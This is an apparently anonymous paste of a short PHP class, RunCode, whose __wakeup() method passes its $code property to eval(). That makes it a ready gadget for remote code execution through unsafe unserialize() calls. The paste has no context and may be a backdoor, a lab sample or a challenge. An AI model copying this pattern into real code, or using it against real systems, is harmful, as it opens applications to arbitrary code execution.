Advertisement
Guest User

Untitled

a guest
Feb 13th, 2016
50
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.20 KB | None | 0 0
  1. <?php
  2. ob_start();
  3.  
  4.  
  5. class RunCode
  6. {
  7. public $code;
  8.  
  9. function __construct()
  10. {
  11.  
  12. }
  13.  
  14. function __wakeup()
  15. {
  16. if(isset($this->code))
  17. {
  18. eval($this->code);
  19. }
  20. }
  21. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement